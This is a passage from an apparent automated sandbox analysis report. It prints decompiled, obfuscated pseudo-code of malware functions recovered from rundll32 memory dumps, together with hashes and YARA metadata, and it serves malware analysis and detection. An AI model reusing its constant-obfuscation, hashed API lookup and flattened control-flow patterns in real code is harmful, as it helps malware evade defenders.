				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t69;
				signed int _t73;
				intOrPtr* _t79;
				intOrPtr* _t80;
				void* _t81;

				_v32 = _v32 & 0x00000000;
				_v40 = 0x1d1d13;
				_v36 = 0x222c2b;
				_v20 = 0x8e6b;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x0011cb3d;
				_v16 = 0xc711;
				_v16 = _v16 >> 0xa;
				_t73 = 0xe;
				_v16 = _v16 * 0x46;
				_v16 = _v16 ^ 0x000025d9;
				_v12 = 0x5a6f;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 * 0x7c;
				_v12 = _v12 ^ 0x007c57cb;
				_v24 = 0xc850;
				_v24 = _v24 | 0x7c4bf75d;
				_v24 = _v24 ^ 0x7c4b9b6b;
				_v28 = 0x7391;
				_v28 = _v28 + 0x5592;
				_v28 = _v28 ^ 0x0000ce0e;
				_v8 = 0x1617;
				_v8 = _v8 / _t73;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 * 0x60;
				_v8 = _v8 ^ 0x00003b9a;
				_t79 =  *((intOrPtr*)(E00433278() + 0xc)) + 0xc;
				_t80 =  *_t79;
				while(_t80 != _t79) {
					_t58 = _t80 + 0x30; // 0xfef84d81
					_t69 = E0043165C( *_t58, _v12, _v24, _v28, _v8);
					_t81 = _t81 + 0xc;
					if((_t69 ^ 0x1f8fefc1) == _a4) {
						_t60 = _t80 + 0x18; // 0xe845c718
						return  *_t60;
					}
					_t80 =  *_t80;
				}
				return 0;
			}

0x00440229
0x0044022f
0x00440236
0x0044023d
0x00440244
0x00440247
0x0044024b
0x00440252
0x00440259
0x00440265
0x00440266
0x00440269
0x00440270
0x00440277
0x0044027b
0x00440283
0x00440286
0x0044028d
0x00440294
0x0044029b
0x004402a2
0x004402a9
0x004402b0
0x004402b7
0x004402c3
0x004402c6
0x004402ce
0x004402d1
0x004402e6
0x004402e9
0x00440310
0x004402f9
0x004402fc
0x00440306
0x0044030c
0x0044031c
0x00000000
0x0044031c
0x0044030e
0x0044030e
0x00000000

Strings

+,", xrefs: 00440236

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +,"
API String ID: 0-654858841
Opcode ID: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
Instruction ID: 2b25c354d979a38e4ac722cf9b96541f48a7d225154781bafa8be219b47be6d1
Opcode Fuzzy Hash: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
Instruction Fuzzy Hash: 2C313471D0060DEBEB04CFA5C98A99EFBB0FB44314F20859AD516BB250D3B86B54CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0017D3F5, Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

%<, xrefs: 0017D449

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %<
API String ID: 0-2252717727
Opcode ID: d0c9b719ae2acfba52d1ca39c39c417e0af17c540289deb21c027bbdd74d7c36
Instruction ID: 380d569bc677badca4c51c7a49da86d448ca069fc7b51f96eab5d7bb51f6d8ad
Opcode Fuzzy Hash: d0c9b719ae2acfba52d1ca39c39c417e0af17c540289deb21c027bbdd74d7c36
Instruction Fuzzy Hash: 2121F375D0130DEBEB48DFA6C90A4EEBFB4EB10318F108498D425B6290D3B84B14DF92

Uniqueness

Uniqueness Score: -1.00%

Function 004409B8, Relevance: 1.3, Strings: 1, Instructions: 59
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E004409B8(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t54;
				signed int _t62;
				signed int _t63;

				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t54 = E00442550(0);
				_v28 = _t54;
				_v24 = _t54;
				_v32 = 0x34e779;
				_v20 = 0xed53;
				_v20 = _v20 >> 2;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x000ef232;
				_v16 = 0x8c43;
				_t62 = 0x6e;
				_v16 = _v16 * 0x16;
				_t63 = 0x43;
				_v16 = _v16 / _t62;
				_v16 = _v16 | 0xa5153760;
				_v16 = _v16 ^ 0xa5150d1d;
				_v12 = 0x71b1;
				_v12 = _v12 | 0x28689702;
				_v12 = _v12 ^ 0x24ff525f;
				_v12 = _v12 ^ 0x99266ed7;
				_v12 = _v12 ^ 0x95b1ff33;
				_v8 = 0x9915;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 / _t63;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0000698b;
				return E0044E232(_v20, _v16, __edx, _a12, _v12, _t63, _v8);
			}

0x004409bf
0x004409c6
0x004409c9
0x004409ca
0x004409cb
0x004409cc
0x004409d1
0x004409d7
0x004409dc
0x004409e3
0x004409ea
0x004409ee
0x004409f2
0x004409f9
0x00440a06
0x00440a09
0x00440a11
0x00440a12
0x00440a17
0x00440a1e
0x00440a25
0x00440a2c
0x00440a33
0x00440a3a
0x00440a41
0x00440a48
0x00440a4f
0x00440a58
0x00440a5b
0x00440a5f
0x00440a83

Strings

y4, xrefs: 004409DC

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: y4
API String ID: 0-35764640
Opcode ID: 85987d0af05f291c1bba09fd4deff99604705c1734ec6e85378ee402cbfd5748
Instruction ID: d692b2007c1cf34104ca15e997c4ac301b6e6a07da482edeab23995aa63792f9
Opcode Fuzzy Hash: 85987d0af05f291c1bba09fd4deff99604705c1734ec6e85378ee402cbfd5748
Instruction Fuzzy Hash: 0B2140B1C0120DEBEB08DFE9C80A8AEBBB1FB40304F108099E425A7260D7B95B50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0017FF2C, Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

y4, xrefs: 0017FF50

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: y4
API String ID: 0-35764640
Opcode ID: b78e4ec7b0daa4de19488d10b39de6a407231f003e24876a1e2b7fd591ae7ca5
Instruction ID: 9f579fc2795265431f8e57c9308775d9e75c2d35961a90f01ce77ef70eb883df
Opcode Fuzzy Hash: b78e4ec7b0daa4de19488d10b39de6a407231f003e24876a1e2b7fd591ae7ca5
Instruction Fuzzy Hash: D62120B1D0121DEBDB08DFE9C80A8EEBBB5FB40304F108199E525A72A0D7B95B51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0043E612, Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0043E612() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _t219;
				short _t230;
				short _t232;
				void* _t237;
				void* _t238;
				void* _t258;
				short* _t259;
				void* _t260;
				short* _t261;
				short* _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t270;

				_v96 = _v96 & 0x00000000;
				_v108 = 0x4935a9;
				_t238 = 0x2385cbc3;
				_v104 = 0x1767a9;
				_v100 = 0x71ae0c;
				_v20 = 0x2668;
				_t258 =  *0x451088 + 0x38;
				_v20 = _v20 | 0x7ba2ed9b;
				_v20 = _v20 + 0xffff3c7d;
				_v20 = _v20 + 0xffff231c;
				_v20 = _v20 ^ 0x7ba17e9e;
				_v56 = 0xe8af;
				_v56 = _v56 + 0xfa0e;
				_v56 = _v56 ^ 0x9e111eab;
				_v56 = _v56 ^ 0x9e10e373;
				_v24 = 0x871c;
				_v24 = _v24 << 0xf;
				_v24 = _v24 >> 4;
				_v24 = _v24 + 0xffffba2c;
				_v24 = _v24 ^ 0x0438e224;
				_v60 = 0x90d6;
				_v60 = _v60 | 0xb72a7a32;
				_v60 = _v60 + 0xffff6a8c;
				_v60 = _v60 ^ 0xb72a6d3a;
				_v84 = 0xc38;
				_v84 = _v84 | 0xf14ca8d2;
				_v84 = _v84 ^ 0xf14c81a8;
				_v80 = 0x2669;
				_t263 = 0x64;
				_v80 = _v80 / _t263;
				_v80 = _v80 ^ 0x0000244e;
				_v76 = 0xca1e;
				_t264 = 0x22;
				_v76 = _v76 / _t264;
				_v76 = _v76 ^ 0x000038d6;
				_v68 = 0x7bb5;
				_v68 = _v68 | 0x2bfa8cc8;
				_v68 = _v68 + 0xffff7471;
				_v68 = _v68 ^ 0x2bfa6fbb;
				_v32 = 0xfcd5;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x2150d801;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x000853df;
				_v28 = 0xef37;
				_v28 = _v28 ^ 0x5be54c03;
				_v28 = _v28 | 0x52b36e66;
				_v28 = _v28 + 0x9a0c;
				_v28 = _v28 ^ 0x5bf8fb3a;
				_v64 = 0xdcca;
				_v64 = _v64 + 0xd7f5;
				_v64 = _v64 >> 8;
				_v64 = _v64 ^ 0x000070b2;
				_v72 = 0xbeda;
				_t265 = 0x5d;
				_v72 = _v72 * 0x2c;
				_v72 = _v72 ^ 0x0020a7ce;
				_v8 = 0xad8b;
				_v8 = _v8 ^ 0x0a8bb6d2;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x0c70cf11;
				_v16 = 0xcb7;
				_v16 = _v16 / _t265;
				_t266 = 0x25;
				_v16 = _v16 / _t266;
				_v16 = _v16 + 0xffff7a88;
				_v16 = _v16 ^ 0xffff53c8;
				_v52 = 0x513d;
				_v52 = _v52 | 0x7fbc6d9f;
				_v52 = _v52 ^ 0x7fbc6fd5;
				_v12 = 0xd2d6;
				_v12 = _v12 + 0xec15;
				_v12 = _v12 | 0xf7fef9de;
				_v12 = _v12 ^ 0xf7ffcc6d;
				_v48 = 0x3b6f;
				_v48 = _v48 + 0xffff5d9c;
				_v48 = _v48 + 0xffff2e60;
				_v48 = _v48 ^ 0xfffe9d66;
				_v44 = 0xd292;
				_v44 = _v44 + 0x28de;
				_t219 = _v44;
				_t267 = 0x15;
				_t252 = _t219 % _t267;
				_v44 = _t219 / _t267;
				_t237 = 2;
				_v44 = _v44 * 0x6d;
				_v44 = _v44 ^ 0x000550f8;
				_v40 = 0x4184;
				_v40 = _v40 * 0x2c;
				_v40 = _v40 + 0xa5cf;
				_v40 = _v40 << 0xa;
				_v40 = _v40 ^ 0x2fa1cfd8;
				_v88 = 0x2b12;
				_v88 = _v88 + 0xffff5308;
				_v88 = _v88 ^ 0xffff15a9;
				_v36 = 0x98e2;
				_v36 = _v36 >> 2;
				_v36 = _v36 + 0xffffa9a0;
				_v36 = _v36 | 0xdd3f0fc1;
				_v36 = _v36 ^ 0xffff9d62;
				do {
					while(_t238 != 0x135586c5) {
						if(_t238 == 0x1d3b4bfc) {
							_t268 = E0043DF8A(_t238, _t252, __eflags, 0x10, 4);
							E00449A27( &_v92, _t237, _v60, 1, _t258, _v84, _v80, _v76);
							_t260 = _t258 + _t237;
							_t252 = 1;
							E00449A27( &_v92, 1, _v68, _t268, _t260, _v32, _v28, _v64);
							_t270 = _t270 + 0x38;
							_t261 = _t260 + _t268 * 2;
							_t238 = 0x35eda080;
							_t230 = 0x5c;
							 *_t261 = _t230;
							_t258 = _t261 + _t237;
							continue;
						} else {
							if(_t238 == 0x2385cbc3) {
								_t232 = E0043A156();
								_v92 = _t232;
								_t238 = 0x1d3b4bfc;
								continue;
							} else {
								_t275 = _t238 - 0x35eda080;
								if(_t238 == 0x35eda080) {
									_t269 = E0043DF8A(_t238, _t252, _t275, 0x10, 4);
									_t252 = 1;
									E00449A27( &_v92, 1, _v16, _t269, _t258, _v52, _v12, _v48);
									_t270 = _t270 + 0x20;
									_t262 = _t258 + _t269 * 2;
									_t238 = 0x135586c5;
									_t232 = 0x2e;
									 *_t262 = _t232;
									_t258 = _t262 + _t237;
									continue;
								}
							}
						}
						goto L9;
					}
					_t252 = 1;
					E00449A27( &_v92, 1, _v44, 3, _t258, _v40, _v88, _v36);
					_t259 = _t258 + 6;
					_t270 = _t270 + 0x18;
					_t238 = 0x18dc1a34;
					 *_t259 = 0;
					_t258 = _t259 + _t237;
					__eflags = _t258;
					L9:
					__eflags = _t238 - 0x18dc1a34;
				} while (__eflags != 0);
				return _t232;
			}

0x0043e618
0x0043e61e
0x0043e625
0x0043e62a
0x0043e631
0x0043e641
0x0043e648
0x0043e64b
0x0043e652
0x0043e659
0x0043e660
0x0043e667
0x0043e66e
0x0043e675
0x0043e67c
0x0043e683
0x0043e68a
0x0043e68e
0x0043e692
0x0043e699
0x0043e6a0
0x0043e6a7
0x0043e6ae
0x0043e6b5
0x0043e6bc
0x0043e6c3
0x0043e6ca
0x0043e6d1
0x0043e6dd
0x0043e6e2
0x0043e6e7
0x0043e6ee
0x0043e6f8
0x0043e6fd
0x0043e702
0x0043e709
0x0043e710
0x0043e717
0x0043e71e
0x0043e725
0x0043e72c
0x0043e730
0x0043e737
0x0043e73b
0x0043e742
0x0043e749
0x0043e750
0x0043e757
0x0043e75e
0x0043e765
0x0043e76c
0x0043e773
0x0043e777
0x0043e77e
0x0043e789
0x0043e78a
0x0043e78d
0x0043e794
0x0043e79b
0x0043e7a6
0x0043e7a9
0x0043e7ad
0x0043e7b4
0x0043e7c0
0x0043e7ca
0x0043e7cf
0x0043e7d4
0x0043e7db
0x0043e7e2
0x0043e7e9
0x0043e7f0
0x0043e7f7
0x0043e7fe
0x0043e805
0x0043e80c
0x0043e813
0x0043e81a
0x0043e821
0x0043e828
0x0043e82f
0x0043e836
0x0043e83d
0x0043e840
0x0043e841
0x0043e845
0x0043e84c
0x0043e84d
0x0043e850
0x0043e857
0x0043e862
0x0043e865
0x0043e86c
0x0043e870
0x0043e877
0x0043e87e
0x0043e885
0x0043e88c
0x0043e893
0x0043e897
0x0043e89e
0x0043e8a5
0x0043e8ac
0x0043e8ac
0x0043e8be
0x0043e93f
0x0043e94a
0x0043e952
0x0043e95f
0x0043e965
0x0043e96a
0x0043e96d
0x0043e970
0x0043e977
0x0043e978
0x0043e97b
0x00000000
0x0043e8c0
0x0043e8c6
0x0043e916
0x0043e91b
0x0043e91e
0x00000000
0x0043e8c8
0x0043e8c8
0x0043e8ce
0x0043e8e6
0x0043e8f3
0x0043e8f9
0x0043e8fe
0x0043e901
0x0043e904
0x0043e90b
0x0043e90c
0x0043e90f
0x00000000
0x0043e90f
0x0043e8ce
0x0043e8c6
0x00000000
0x0043e8be
0x0043e98d
0x0043e997
0x0043e99c
0x0043e9a1
0x0043e9a4
0x0043e9a9
0x0043e9ac
0x0043e9ac
0x0043e9ae
0x0043e9ae
0x0043e9ae
0x0043e9c0

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 995e00b6e3bbe9782a1bcc5864e03ec7f0c8c8d505a82900f485f1e3ccf108dd
Instruction ID: 3aa14a204becc802a46b4243297f2a04e5fb68f9a8a227cc73567ae7d8d75fe8
Opcode Fuzzy Hash: 995e00b6e3bbe9782a1bcc5864e03ec7f0c8c8d505a82900f485f1e3ccf108dd
Instruction Fuzzy Hash: 99B12372D01319ABDF28CFE5D88A5DEBBB1FF44314F248159E101BA2A0D7B90A46CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0017DB86, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4949545701073c0452a974a92e1707d2150ce4ae3387db057db6a61aabe181
Instruction ID: fa2c7ccb566e0c87fa9df00c38f0f3f63064f3c47104124e88a2771c2a1a403e
Opcode Fuzzy Hash: aa4949545701073c0452a974a92e1707d2150ce4ae3387db057db6a61aabe181
Instruction Fuzzy Hash: 37B12272D0131DABDB28CFE5D88A5DEBBB1BF54314F248159E101BA2A0D7B81A46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0044CBE7, Relevance: .2, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0044CBE7(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* _t219;
				signed int _t250;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t284;
				void* _t286;

				_push(_a12);
				_t286 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t219);
				_v72 = 0xff63;
				_t254 = 0x3f;
				_v72 = _v72 / _t254;
				_v72 = _v72 ^ 0x0000040c;
				_v44 = 0x91a7;
				_v44 = _v44 + 0x72f0;
				_v44 = _v44 + 0xffff06b2;
				_v44 = _v44 ^ 0x7ebd7edf;
				_v44 = _v44 ^ 0x7ebd7382;
				_v80 = 0x7372;
				_v80 = _v80 + 0x2298;
				_v80 = _v80 ^ 0x00009e0a;
				_v32 = 0xf77b;
				_v32 = _v32 + 0xffff7d6a;
				_v32 = _v32 << 2;
				_v32 = _v32 + 0x362;
				_v32 = _v32 ^ 0x0001db13;
				_v16 = 0x136c;
				_v16 = _v16 + 0x48d8;
				_v16 = _v16 ^ 0xac4e468e;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 ^ 0x002b0548;
				_v40 = 0x3373;
				_v40 = _v40 + 0xffffe1ff;
				_v40 = _v40 + 0xffff2492;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x003fb2a7;
				_v56 = 0x21f6;
				_t255 = 0x1f;
				_v56 = _v56 * 0x2b;
				_v56 = _v56 / _t255;
				_v56 = _v56 ^ 0x00002778;
				_v68 = 0x53f7;
				_v68 = _v68 ^ 0xc2013ade;
				_v68 = _v68 ^ 0xc201165c;
				_v88 = 0x904;
				_v88 = _v88 + 0xffff70ae;
				_v88 = _v88 ^ 0xffff0cbd;
				_v12 = 0x6bbb;
				_t256 = 0x5d;
				_t284 = 0x1e;
				_v12 = _v12 * 0x56;
				_v12 = _v12 + 0x87c0;
				_v12 = _v12 + 0xffff5e93;
				_v12 = _v12 ^ 0x002412a1;
				_v8 = 0x6b19;
				_v8 = _v8 / _t256;
				_v8 = _v8 >> 1;
				_v8 = _v8 / _t284;
				_v8 = _v8 ^ 0x00002578;
				_v24 = 0x1b3a;
				_v24 = _v24 + 0x4480;
				_v24 = _v24 + 0xffff3a7d;
				_v24 = _v24 + 0xffff7f01;
				_v24 = _v24 ^ 0xffff7fa1;
				_v28 = 0x593f;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x30479afe;
				_v28 = _v28 | 0x2165af19;
				_v28 = _v28 ^ 0x3167a871;
				_v76 = 0x861a;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x00001e41;
				_v20 = 0xbc3c;
				_v20 = _v20 + 0xffff2788;
				_v20 = _v20 >> 6;
				_v20 = _v20 + 0xffff65b3;
				_v20 = _v20 ^ 0x03ff130c;
				_v92 = 0x12c7;
				_v92 = _v92 + 0xffff7146;
				_v92 = _v92 ^ 0xffff9baa;
				_v36 = 0xedf2;
				_v36 = _v36 << 3;
				_t257 = 0xc;
				_v36 = _v36 * 0xa;
				_v36 = _v36 ^ 0x56c2f471;
				_v36 = _v36 ^ 0x5688d77c;
				_v64 = 0x6a0;
				_v64 = _v64 * 0x5b;
				_v64 = _v64 ^ 0x0002624d;
				_v84 = 0xe931;
				_v84 = _v84 * 0x43;
				_v84 = _v84 ^ 0x003d25b3;
				_v60 = 0xc012;
				_t258 = 0x27;
				_v60 = _v60 / _t257;
				_v60 = _v60 ^ 0x00000568;
				_v48 = 0xfc11;
				_v48 = _v48 | 0xf924173d;
				_v48 = _v48 / _t258;
				_v48 = _v48 ^ 0x06636dad;
				_v52 = 0xa67a;
				_v52 = _v52 ^ 0x536712b1;
				_v52 = _v52 << 2;
				_v52 = _v52 ^ 0x4d9efdac;
				E00435755(_v32,  &_v124, _v16, _v40, _t284);
				E00435755(_v56,  &_v644, _v68, _v88, 0x208);
				E00435755(_v12,  &_v1164, _v8, _v24, 0x208);
				E004403F1(_v28, _v76, _t286,  &_v644, _v20, _v92);
				E004403F1(_v36, _v64, _a12,  &_v1164, _v84, _v60);
				_v120 = _v72;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v80 | _v44;
				_t250 = E0043E554(_v48,  &_v124, _v52);
				asm("sbb eax, eax");
				return  ~_t250 + 1;
			}

0x0044cbf2
0x0044cbf5
0x0044cbf7
0x0044cbfa
0x0044cbfd
0x0044cbfe
0x0044cbff
0x0044cc04
0x0044cc12
0x0044cc17
0x0044cc1c
0x0044cc23
0x0044cc2a
0x0044cc31
0x0044cc38
0x0044cc3f
0x0044cc46
0x0044cc4d
0x0044cc54
0x0044cc5b
0x0044cc62
0x0044cc69
0x0044cc6d
0x0044cc74
0x0044cc7b
0x0044cc82
0x0044cc89
0x0044cc90
0x0044cc94
0x0044cc9b
0x0044cca2
0x0044cca9
0x0044ccb0
0x0044ccb4
0x0044ccbb
0x0044ccc6
0x0044ccc9
0x0044ccd3
0x0044ccd6
0x0044ccdd
0x0044cce4
0x0044cceb
0x0044ccf2
0x0044ccf9
0x0044cd00
0x0044cd07
0x0044cd12
0x0044cd15
0x0044cd16
0x0044cd19
0x0044cd20
0x0044cd27
0x0044cd2e
0x0044cd3c
0x0044cd3f
0x0044cd47
0x0044cd4a
0x0044cd51
0x0044cd58
0x0044cd5f
0x0044cd66
0x0044cd6d
0x0044cd76
0x0044cd7d
0x0044cd81
0x0044cd88
0x0044cd8f
0x0044cd96
0x0044cd9d
0x0044cda1
0x0044cda8
0x0044cdaf
0x0044cdb6
0x0044cdba
0x0044cdc1
0x0044cdc8
0x0044cdcf
0x0044cdd6
0x0044cddd
0x0044cde4
0x0044cdee
0x0044cdf1
0x0044cdf4
0x0044cdfb
0x0044ce02
0x0044ce0d
0x0044ce10
0x0044ce17
0x0044ce22
0x0044ce25
0x0044ce2c
0x0044ce38
0x0044ce39
0x0044ce3e
0x0044ce45
0x0044ce4c
0x0044ce59
0x0044ce5f
0x0044ce66
0x0044ce6d
0x0044ce74
0x0044ce78
0x0044ce88
0x0044cea2
0x0044ceb7
0x0044ced0
0x0044ceee
0x0044cef9
0x0044cf02
0x0044cf0b
0x0044cf1a
0x0044cf1e
0x0044cf28
0x0044cf30

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba3467f06acdf9d06503376040d4ce359b65c62597fe6af5f322f40bb5cf6547
Instruction ID: c5ffde5616b5be949876f0804d36818d3e62e492cdadaf692a03a88a421c965e
Opcode Fuzzy Hash: ba3467f06acdf9d06503376040d4ce359b65c62597fe6af5f322f40bb5cf6547
Instruction Fuzzy Hash: F3A1EFB1D01219EBEF58CFE5D9898DEFBB1FF44318F208159E411BA2A0D7B81A468F44

Uniqueness

Uniqueness Score: -1.00%

Function 0018C15B, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ea68c10d15278ac49c801fb238b372f48627dc15057eefc62ed6f36c75a0e2
Instruction ID: f72ebcf4cfb228e5f7158f76b789bc5edae7259c72ce74c0ceea37a67e801e08
Opcode Fuzzy Hash: 08ea68c10d15278ac49c801fb238b372f48627dc15057eefc62ed6f36c75a0e2
Instruction Fuzzy Hash: 63A1FEB1D01219EBEF58CFE5D98A8DEFBB1BF44314F208159E411BA2A0D7B81A46CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0017598B, Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74bbbfef80275cc225fbb300c148a6558012b133be6a1c7b0e45d04742c38daa
Instruction ID: 8477f9d4bbfee20fc327edf2dbb7f060748b4386534e6f645dd29e39a40e2848
Opcode Fuzzy Hash: 74bbbfef80275cc225fbb300c148a6558012b133be6a1c7b0e45d04742c38daa
Instruction Fuzzy Hash: 2291E071400648ABDF59CF64C98A8CE3FB1FF44358F509218FE2A961A0D3B6C999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00442FA1, Relevance: .1, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00442FA1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v152;
				void* _t110;
				void* _t117;
				intOrPtr _t123;
				intOrPtr _t125;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr _t160;
				void* _t161;
				void* _t163;
				void* _t164;

				_t164 = __eflags;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t110);
				_v88 = 0x5fdafb;
				_t150 =  &_v152;
				_v84 = 0x272783;
				_t160 = 0;
				_v80 = 0xd89dc;
				_v76 = 0;
				_v48 = 0x58f7;
				_v48 = _v48 + 0xcffd;
				_v48 = _v48 ^ 0x00015f94;
				_v12 = 0xd46e;
				_v12 = _v12 | 0xfa6bedce;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0fa6c3f2;
				_v16 = 0x3620;
				_v16 = _v16 | 0xaf83d9cf;
				_v16 = _v16 ^ 0x6ff25359;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x180e6d86;
				_v44 = 0x33ae;
				_v44 = _v44 + 0xffff05b5;
				_v44 = _v44 ^ 0xffff5bf3;
				_v24 = 0x830a;
				_v24 = _v24 | 0xa02b6576;
				_v24 = _v24 + 0xffff5bd8;
				_v24 = _v24 ^ 0xa02b6dd8;
				_v28 = 0xcb19;
				_v28 = _v28 << 7;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x00cb50e4;
				_v36 = 0x6363;
				_v36 = _v36 | 0xa74857af;
				_v36 = _v36 ^ 0x416ac2c3;
				_v36 = _v36 ^ 0xe622f2da;
				_v32 = 0xc5a6;
				_v32 = _v32 ^ 0x561a69db;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x0d563ace;
